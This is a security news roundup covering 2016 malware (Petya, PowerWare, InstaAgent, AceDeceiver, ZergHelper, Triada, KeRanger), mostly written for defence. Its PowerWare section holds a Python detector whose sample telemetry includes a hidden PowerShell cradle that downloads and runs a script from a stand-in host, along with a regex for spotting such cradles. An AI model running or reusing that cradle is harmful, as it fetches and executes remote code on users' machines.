Ransomware Petya encrypts not files but whole hard drive

To achieve its goal, the attacker sends out an innocuous-looking email that purports to be from a job applicant, with instructions to download a CV hosted in a Dropbox folder. Following the link downloads an EXE file. When the EXE file is run, the PC crashes with a bluescreen and reboots. Before the reboot, the Master Boot Record (MBR) of the system is manipulated in a way that allows Petya to control the boot process.

Petya sets itself apart by the volume of data it tries to encrypt. While most ransomware is content with encrypting single files, usually documents that seem important, Petya goes for the entire hard drive instead. After the user unwittingly runs the program carrying the ransomware, Petya takes over the bootloader and restarts the computer. It then displays a screen informing the user that Windows is performing a check disk operation when, in fact, it is already trying to encrypt the entire disk. Once done, it reveals its true colors, literally, directing the victim to browse to a specific website using Tor for anonymity. The website, in turn, contains instructions on how to pay the ransom. The ransom doubles in price after 7 days.


We recommend not paying the requested ransom and, as soon as you read this blog, ensuring that all your data is backed up. That way, should the worst happen, you can just copy that image back across.

This is by no means the first ransomware online; it is part of a worrying trend that seems to line up businesses as more lucrative victims than individuals: one hospital this year has already paid $17,000 in bitcoins after it was locked out of its network.

As with many of these attacks, Petya relies on computer users clicking links sent in emails before really considering what they are, or the potential implications. One sure-fire way to cut down on these is simply to refuse to open random files from people you don't know. Be careful: do not open any attachments or click on any links that you were not expecting or that do not concern you.

PowerWare uses Windows PowerShell to encrypt files

PowerWare is a crypto-ransomware. What sets it apart from other crypto malware is that it is fileless, a tactic also adopted by other malware families pushed by prolific exploit kits such as Angler. A malware family called PowerSniff shows behavior similar to PowerWare, including fileless infection.

The criminal gangs behind PowerWare spread it through spam messages carrying a Word document attachment that purports to be an invoice. The attackers use an old trick to convince victims to enable macros: the document asks them to enable macros in order to view it correctly.

The macro runs cmd.exe, which launches PowerShell, the native Windows framework that uses a command-line shell to perform a wide range of tasks. PowerShell is the program that actually encrypts the files: a script is downloaded and fed to it. This means no ‘traditional’ malware and no additional executable is needed, just a text document (the script).

Using PowerShell lets the ransomware avoid writing files to disk, which makes the threat harder to detect, while still allowing it to encrypt files on the victim’s PC. The PowerShell ransomware demands that victims pay a $500 ransom to restore the encrypted files. In this case too, the ransom doubles if the victim misses the deadline.
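The chain described above (Office document macro, then cmd.exe, then PowerShell running a script fetched from the network) is visible in process-creation telemetry. The following detection logic is an added example, not PowerWare's code or any vendor's product; the event tuple layout, the sample events and the process names it keys on are constructed for illustration.

```python
"""Flag the PowerWare-style execution chain (Office macro -> cmd.exe -> powershell.exe
running a downloaded script) in process-creation telemetry.

Added, hypothetical example: the event layout below is constructed and is not
PowerWare's code or any vendor's log schema."""
import re

# Constructed sample events: (pid, parent_pid, image_path, command_line).
SAMPLE_EVENTS = [
    (100, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    (200, 100, r"C:\Program Files\Microsoft Office\WINWORD.EXE", "WINWORD.EXE invoice.doc"),
    (300, 200, r"C:\Windows\System32\cmd.exe", "cmd.exe /c powershell -nop -w hidden ..."),
    (400, 300, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass "
     "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/f.ps1')"),
    # Benign administrative PowerShell use from a console, for contrast.
    (500, 100, r"C:\Windows\System32\cmd.exe", "cmd.exe"),
    (600, 500, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "powershell.exe Get-Service"),
]

OFFICE_IMAGES = {"winword.exe", "excel.exe", "powerpnt.exe"}
# Command-line fragments typical of a script pulled from the network and run in memory.
CRADLE_RE = re.compile(
    r"downloadstring|downloadfile|invoke-expression|\biex\b|-enc(odedcommand)?\b",
    re.IGNORECASE)

def basename(path):
    """Lower-cased file name of a Windows image path."""
    return path.rsplit("\\", 1)[-1].lower()

def find_powerware_chains(events):
    """Return PIDs of powershell.exe processes whose ancestry is Office -> cmd.exe ->
    powershell.exe and whose command line carries a download-and-execute cradle."""
    by_pid = {pid: (ppid, image, cmd) for pid, ppid, image, cmd in events}
    hits = []
    for pid, (ppid, image, cmd) in by_pid.items():
        if basename(image) != "powershell.exe" or not CRADLE_RE.search(cmd):
            continue
        parent = by_pid.get(ppid)
        if parent is None or basename(parent[1]) != "cmd.exe":
            continue
        grandparent = by_pid.get(parent[0])
        if grandparent is not None and basename(grandparent[1]) in OFFICE_IMAGES:
            hits.append(pid)
    return hits

if __name__ == "__main__":
    print("suspicious powershell PIDs:", find_powerware_chains(SAMPLE_EVENTS))  # [400]
```

The benign console session (PIDs 500 and 600) is not flagged because it has neither an Office ancestor nor a download cradle on its command line.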

Who viewed me on Instagram

Recently, a malicious application called “InstaCare – Who cares with me” was released via the Google Play Store and the App Store. It serves as a hook to lure Instagram users, pretending to let them know who has viewed their profile; in reality it abuses the authentication process used to connect to Instagram, steals the user’s Instagram password and gains access to their profile.

The app claims to display your friend list ordered by who interacts with your profile the most, and to show up to the 100 most recent entries for your Instagram profile.


It’s common for many applications to use APIs or authorization protocols such as OAuth to authenticate with third-party applications. This is very convenient for users, as they can use the same credentials to authenticate with different applications and services. The problem is that some applications can abuse this feature to gain access to the user’s information, such as their profile and contacts, or to steal their credentials.

Last week the InstaAgent developer “Turker Bayram” released a new app for Android and the iOS App Store, after his (malicious) app “InstaAgent” was pulled by Apple and Google from their app stores. It is astonishing that Apple and Google didn’t take a closer look at his new application; one would assume a developer who has already published a malicious app would be watched more closely. His new app is called “Who Viewed Me on Instagram” (Android version, 50K – 100K downloads) and “InstaCare – Who cares with me?” (iOS version, a top-grossing app in Germany in the Entertainment category). The app promises the same functionality as InstaAgent.

iPhones can get infected even if they are not jailbroken

A brand new malware strain has just been discovered: a sneaky attack that has fooled Apple’s app review team into allowing malicious apps into the App Store, and that can also quietly install apps on any iOS device without the user’s explicit knowledge or permission. The device does not even need to be jailbroken for the attack to work.

AceDeceiver is the first iOS malware we have seen that abuses certain design flaws in Apple’s DRM protection mechanism, FairPlay, to install malicious apps on iOS devices regardless of whether they are jailbroken. The attack requires a PC to deploy the software. The malware is currently affecting users in China. Three AceDeceiver apps disguised as wallpaper tools made their way onto the App Store between July 2015 and February 2016.

This is not the first iOS malware we have seen in recent times. Researchers found a strain of malware called YiSpecter that targeted jailbroken as well as non-jailbroken devices in Taiwan and China. That malware, however, leveraged private APIs and enterprise-certificate signing to look authentic.

As for AceDeceiver, only users in China seem to be affected for now, although with slight tweaks users in other regions could also be targeted. Apple normally prides itself on iOS’s security, but has still had to periodically remove App Store titles because of dangerous code.

Chinese App creates another App Store inside Apple’s iOS App Store

An iOS app that provided access to pirated apps successfully got through Apple’s strict approval process. The Chinese developers of an app called Happy Daily English found a way to get around Apple’s review process, embed a fully functional iOS app store inside their application, and have it hosted on the official iOS App Store itself.

For non-Chinese users, the app was a simple educational app that taught Chinese users English, but for Chinese users it transformed itself into an app store that let them install rogue, pirated or cracked apps using various tricks, without requiring them to go through the side-loading process.

The app got approved and added to Apple’s App Store because the reviewers accessed it from outside China and, seeing its educational interface, didn’t notice anything strange. On top of this, the app (dubbed ZergHelper by the researchers who found it) was coded in Lua, a programming language that allowed the developers to update the app dynamically without going through Apple’s app review process. This technique allowed the developers to change the app’s behavior without the risk of being discovered during subsequent updates.

The malicious store-in-store app existed on the official App Store from October 30, 2015, to February 19, 2016. Apple removed the app after it was reported by its discoverer.

Triada Trojan Exists in memory and uses Zygote process to Hook all Applications on Android

Dubbed Triada (Backdoor.AndroidOS.Triada), this malware family was mainly designed to redirect financial SMS transactions to buy additional content or steal money from the user. The Triada Trojan is able to infiltrate all processes running on the mobile device, gaining persistence. The Android malware is spread through an “advertising botnet” that crooks have also used to spread other threats, including Leech, Ztorg, Gorpo and AndroidOS.Iop.

The Triada Trojan was clearly developed by cybercriminals who have a clear understanding of how Android functions at a core level; a tremendous amount of research and work went into developing this malware.

It also marks the first time that malware developed for Android has the same complexity as malware written for Windows. Before now, most of the threats encountered on mobile devices were not nearly as well developed and were very primitive in nature.

Users are more at risk of being affected by Triada if they download and install apps from unknown sources rather than from the Google Play Store.

New OS X Ransomware ‘KeRanger’ encrypts Mac files

Ransomware, one of the fastest-growing types of cyber threats, encrypts data on infected machines, then typically asks users to pay ransoms in hard-to-trace digital currencies to get an electronic key so they can retrieve their data.

Security experts estimate that ransoms total hundreds of millions of dollars a year from such cyber criminals, who typically target users of Microsoft’s Windows operating system.

KeRanger is the name given to what is believed to be the “first fully functional” ransomware on the OS X platform. When incorporated into an app, the malware connects to a remote server via the Tor anonymizing service, then “begins encrypting certain types of document and data files on the system.”

The malware then “demands that victims pay one bitcoin (about $400) to a specific address to retrieve their files.” Researchers say the malicious code is “under active development” and seems to be trying to also encrypt users’ Time Machine backups to also prevent them from being able to recover their backed up data.

The Transmission BitTorrent client installer for OS X was infected with the ransomware; anyone who downloaded and installed Transmission directly between March 4th and March 5th may be infected with the KeRanger malware. Apple has already revoked the certificate, so anyone attempting to open a known-infected version of the Transmission app will now be given a warning dialog box that notes “Transmission.app will damage your computer. You should move it to the Trash,” or “Transmission can’t be opened. You should eject the disk image.”